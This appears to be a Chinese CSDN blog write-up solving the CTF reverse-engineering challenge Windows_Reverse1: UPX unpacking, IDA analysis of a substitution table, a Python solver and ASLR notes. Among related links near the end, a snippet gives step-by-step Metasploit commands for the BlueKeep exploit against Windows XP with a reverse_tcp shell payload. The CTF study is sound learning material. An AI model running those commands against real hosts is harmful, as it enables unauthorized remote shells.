Windows_Reverse1

最新推荐文章于 2022-05-30 14:22:01 发布
最新推荐文章于 2022-05-30 14:22:01 发布
阅读量228 收藏 1
点赞数 1
分类专栏: Reverse # 攻防世界
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/g12231/article/details/119578929
版权

运行一下
在这里插入图片描述
需要我们输入正确的code

查壳
在这里插入图片描述
发现有upx壳,脱壳后不知为何,打开直接闪退,OD也分析不了,但IDA能用

查看反编译代码

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [esp+4h] [ebp-804h] BYREF
  char v5[1023]; // [esp+5h] [ebp-803h] BYREF
  char v6; // [esp+404h] [ebp-404h] BYREF
  char v7[1023]; // [esp+405h] [ebp-403h] BYREF

  v6 = 0;
  memset(v7, 0, sizeof(v7));
  v4 = 0;
  memset(v5, 0, sizeof(v5));
  printf("please input code:");
  scanf("%s", &v6);  //输入code
  sub_401000(&v6);  //对输入的code加密
  if ( !strcmp(&v4, "DDCTF{reverseME}") )
    printf("You've got it!!%s\n", &v4);
  else
    printf("Try again later.\n");
  return 0;
}

查看加密函数

unsigned int __cdecl sub_401000(const char *a1)
{
  _BYTE *v1; // ecx
  unsigned int v2; // edi
  unsigned int result; // eax
  int v4; // ebx

  v2 = 0;
  result = strlen(a1);
  if ( result )
  {
    v4 = a1 - v1;  //a1是输入字符串的地址,v1 = 0, v4 = a1
    do
    {
      *v1 = byte_402FF8[(char)v1[v4]];  //(char)v1[v4]依次指向a1各个字符
      ++v2;  //计数
      ++v1;
      result = strlen(a1);
    }
    while ( v2 < result );
  }
  return result;
}

查看byte_402FF8
在这里插入图片描述
加密函数作用:将code[i] 换成 byte_402FF8[code[i]的ASCII码]

byte_402FF8中有单、双引号,16进制形式感觉容易表示

Exp

byte_402FF8 = [0x7E, 0x7D, 0x7C, 0x7B, 0x7A, 0x79, 0x78, 0x77, 0x76, 0x75, 0x74, 0x73, 0x72, 0x71, 0x70, 0x6F, 0x6E, 0x6D,
               0x6C, 0x6B, 0x6A, 0x69, 0x68, 0x67, 0x66, 0x65, 0x64, 0x63, 0x62, 0x61, 0x60, 0x5F, 0x5E, 0x5D, 0x5C, 0x5B,
               0x5A, 0x59, 0x58, 0x57, 0x56, 0x55, 0x54, 0x53, 0x52, 0x51, 0x50, 0x4F, 0x4E, 0x4D, 0x4C, 0x4B, 0x4A, 0x49,
               0x48, 0x47, 0x46, 0x45, 0x44, 0x43, 0x42, 0x41, 0x40, 0x3F, 0x3E, 0x3D, 0x3C, 0x3B, 0x3A, 0x39, 0x38, 0x37,
               0x36, 0x35, 0x34, 0x33, 0x32, 0x31, 0x30, 0x2F, 0x2E, 0x2D, 0x2C, 0x2B, 0x2A, 0x29, 0x28, 0x27, 0x26, 0x25,
               0x24, 0x23, 0x22, 0x21, 0x20]  #留下可显示字符
s = 'DDCTF{reverseME}'
code = ''
for i in s:
    code += chr(byte_402FF8[ord(i) - 32])  #因为去掉了前32个不可显示字符,所以多减32
print(code)

输出ZZ[JX#,9(9,+9QY!

验证一下
在这里插入图片描述

后来查询得知是程序开启了ASLR,并且出题人又在程序中采用了绝对地址的方式
要关闭ASLR,可以使用PETools,也可以将程序放到windows xp下分析
我选择用工具关闭
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
关闭后程序就能正常运行或者用OD分析

沉着梅牡
关注
专栏目录
XCTF Windows_Reverse1
weixin_44164182的博客
02-11 211
主函数中接收输入后,调用sub_401000后进行判断,即sub_401000执行了关键逻辑,根据用户输入生成待判断的字符串。调用时分别使用堆栈和寄存器传入了两个main函数堆栈的地址,分别是输入字符串地址(堆栈)和执行sub_401000后生成的字符串的保存地址(寄存器ecx)。 生成的字符串来自template_string,并以某种方式按照用户输入进行索引生成,其中template_string如下 生成字符串的索引为 template_string[ptr_output[v4]] v4=raw.
攻防世界 Windows_Reverse2
weixin_53349587的博客
03-13 803
这道题其实不算难,只不过我想的有点复杂了,看来学逆向还是需要具有发散性思维的,有些问题确实想不到啊!! 查壳发现有aspack壳: 根据日常习惯,直接手动脱壳(其实是脱壳工具没找着。。),32位程序,x32dbg打开: 首先看到程序中有一个pushad指令,按照我习惯的脱壳方法,直接F8执行pushad,然后在栈中下一个硬件断点,F9运行,即可找到popad的位置 继续往下执行,一直到地址为0x726425的ret指令执行完: 看到一个关键的jmp指令(jmp的距离比较远,极有可能跳转..
攻防世界 Windows_Reverse1
P_Bloomberg的博客
08-09 466
准备 环境:Windows10 工具:ExeinfoPE、upx、IDA、x32dbg、010Editor 开始 附件是.exe文件,使用ExeinfoPE查看文件信息 能看出来此文件被upx加了壳。 使用upx脱壳 将脱壳后的文件放入IDA静态分析 main函数: int __cdecl main(int argc, const char **argv, const char **envp) { char v4; // [esp+4h] [ebp-804h] BYREF char v5[102
攻防世界逆向高手题之Windows_Reverse1
沐一 · 林 的博客
08-26 974
攻防世界逆向高手题之Windows_Reverse1 继续开启全栈梦想之逆向之旅~ 这题是攻防世界逆向高手题的Windows_Reverse1 下载附件,照例扔入exeinfope中查看信息: UPX壳,32位windows中,扔入我的kali中先用命令upx -d 文件名 脱壳先: 双击运行不了,查看不了起始信息,看了资料说: UPX的壳,手动脱壳或者脱壳机脱壳,但发现脱完壳的程序在win7下打不开,即使是显示没壳(这里后来查到win7包括以上版本开启了ASLR(地址随机化),winxp就没有,如
攻防世界Windows_Reverse1
gonna2011的博客
04-21 164
题目附件打开后发现是个exe文件,先查壳,发现一个UPX壳直接命令去壳,这里我改了一下文件名 之后在查壳就没有了直接用ida打开,找main函数,追踪到sub-401000、byte-402FF8 开始以为是base64,发现不是,是ASCII码,shift+e找到a1 上脚本 最后包上flag{} ...
XCTF 逆向进阶区Windows_Reverse1——WriteUp
qq_43547885的博客
02-20 1092
题目链接: Windows_Reverse1 答题过程 脱壳 首先将程序拖入 Exeinfo PE 中查看相关信息: 发现程序有upx壳, 使用upx -d将壳脱去: 脱壳显示成功, 但奇怪的是程序一运行就闪退. 先不讨论该问题, 最后再来研究. IDA PRO 分析程序 用 IDA PRO 打开该程序, 直接查看反编译代码, 发现程序逻辑非常清晰:int __cdecl main(int...
OVERVIEW – Windows API_s and Internals _ Reverse Engineering.pdf
最新发布
10-06
网络安全渗透测试
baby_reverse.zip
09-24
1. baby_reverse.exe - 这是一个可执行文件,通常在Windows操作系统上运行。根据文件名,它可能是与"baby_reverse"相关的程序,可能是解决某个问题或挑战的工具。可能是编程题目中的反转功能实现,例如字符串、数组...
day01 攻防世界Window_Reverse1
weixin_46625454的博客
05-25 349
攻防世界Window_Reverse1 1.发现是upx壳,使用手工脱壳 2.可以发现pushad,这是加壳前的表现,先保存现场,可以看见被push进去栈中的全部寄存,我们只要对这些数据下硬件访问断点,就可以发现这些数据什么时候被恢复。 3.可见popad指令,恢复现场,准备运行主程序 4.跳到程序主入口,dump下来,修复iat表,这个程序就能脱掉upx壳 修复IAT 5.我们可以看见我们输入的内容是v6,传给sub_401000函数,一开始我很很好奇,为啥这个函数传v4,如何传出来,为啥
攻防世界 Reverse高手进阶区 2分题 Windows_Reverse1
闵行小鱼塘
12-31 435
继续ctf的旅程,攻防世界Reverse高手进阶区的2分题,本篇是Windows_Reverse1的writeup
Windows_Reverse1 攻防世界
re1wn
04-13 1985
Windows_Reverse1 攻防世界
DDCTF2019reverse1_final逆向教程
weixin_42306891的博客
04-18 507
0x1,首先查壳: 是个常见的压缩壳,用手动脱壳即可。 0x2,OD调试程序: 1,最重要的是跳到函数加密的位置,根据这个压缩壳的特点,知道前面是一直的循环,让你找不到程序入口的位置,这里只使用F4跳到鼠标位置就好: 一步步到向下到想要的位置 这个位置是调用的位置,我们F7,进入看看; 2,在一步步走 再次调用位置; 3,其实我们已经知道程序入口,手动脱壳 ...
XCTF-Reverse:re1
_Co1a
11-18 254
题目地址:https://adworld.xctf.org.cn/task/answer?type=reverse&number=4&grade=0&id=5073&page=1 工具:IDA notepad++ IDA Pro 能把软件翻译成C语言代码 将下载下来的文件拖入IDA 思路:可以先用IDA shift+F12——》搜索中文字符串,找到关键的地方 双击flag get F5生成C语言的伪代码 警告:请将光标放在一个函数 解决方法:跳转——》交叉引用
xctf windows_reverse1
weixin_45701079的博客
10-24 382
xctf windows_reverse1 日常水一波 这道题是有加壳的(upx),用010分析就知道了 脱壳之后找到动态调试不行,经大佬讲解,发现win7之后加入了ALSR,然后这个文件不支持ALSR,所以动态调试不行,只能用ida打开 乍一看,v4和v6没有任何关系,但是查看汇编 把v4的地址放入了ecx,然后看调用的函数 v1的保存值就是ecx,所以思路就出来了。v1的值就是main函数的v4的值 然后通过地址相减(仔细看上图会发现是个负数),然后地址的差值作为另一个的索引,这里用了溢出,然后找到
swin-transformer代码详解
tiehanhanzainal的博客
05-30 3252
上图为swin_transformer 的主体框架结构,模型采取层次化的设计,一共包含4个Stage,每个stage都会缩小输入特征图的分辨率,像CNN一样逐层扩大感受野。 patch partition 首先是patch partition结构,该模块的作用是对输入的原始图片通过conv2d进行裁剪为patch_size*patch_size大小的块(不是window_size),设定输出通道来确定嵌入向量的大小。最后将H,W维度展开,并移动到第一维度。代码如下: cla...
Windows_Reverse2 攻防世界
re1wn
04-03 1167
Windows_Reverse2 攻防世界
逆向-reverse1_final
VRMEI的博客
04-18 1726
很简单的一道逆向题目。 用PEid打开查看一下 发现加了一个UPX 不过不要紧 搜索字符串就完事了:) 拉进OD。 直接搜索的话肯定是什么都没有的 所以我们一直F8 直到出现提示字符为止(其中有些循环比较杂乱 可以直接用F4跳过) 好了,停到这里了。 这时候搜索一下ASCII码 有发现了。。 点开00281102 You've got it!! ...
Bugku 五道reverse新手题
太阳照耀我走四方
07-15 730
BugKu五道reverse新手题 1.入门逆向 考点:简单的IDA操作,按R转换字符 用PE查看软件信息,32位。 直接拖入IDA32位打开。! 既然是32位的IDA,打开之后,F5查看伪代码,没有结果。 在主main函数里能看到 按R转换为字符。 得到flag。 总结:这个题入门题,主要按R转换就行。 2.signin 考点:安卓逆向,base64转换 拿到文件看到后缀名是apk,想到应该是安卓文件。 用PE看看。 用IDA打开看看。 直接一堆数据。摸不着思路,百度一下。发现是安卓逆向
如何利用exploit/windows/rcp/cve_2019_0708_bluekeep_rce 与 windows_reverse_tcp payload攻击windows xp靶机。
05-25
首先,需要安装 Metasploit 框架。然后,按照以下步骤进行操作: 1. 打开终端,输入以下命令启动 Metasploit 控制台: ``` msfconsole ``` 2. 确认 Metasploit 已经更新到最新版本。输入以下命令进行更新: ``` msfupdate ``` 3. 确认目标主机的 IP 地址,以及靶机的操作系统是否为 Windows XP。 4. 在 Metasploit 控制台中,输入以下命令来搜索漏洞利用模块: ``` search cve-2019-0708 ``` 5. 找到名为“exploit/windows/rdp/cve_2019_0708_bluekeep_rce”的模块,输入以下命令来使用该模块: ``` use exploit/windows/rdp/cve_2019_0708_bluekeep_rce ``` 6. 输入以下命令,设置目标主机的 IP 地址: ``` set RHOSTS <目标主机IP> ``` 7. 输入以下命令,设置目标主机的端口号(默认为3389): ``` set RPORT <目标主机端口号> ``` 8. 输入以下命令,设置 payload 为 windows/reverse_tcp: ``` set PAYLOAD windows/reverse_tcp ``` 9. 输入以下命令,设置本地监听的 IP 地址: ``` set LHOST <本地IP> ``` 10. 输入以下命令,设置本地监听的端口号: ``` set LPORT <本地端口号> ``` 11. 输入以下命令,运行漏洞利用模块: ``` exploit ``` 12. 等待靶机连接到 Metasploit 并成功获取 shell。 注意:这个漏洞已经被微软修复,因此请不要在未授权的环境中使用该漏洞进行攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值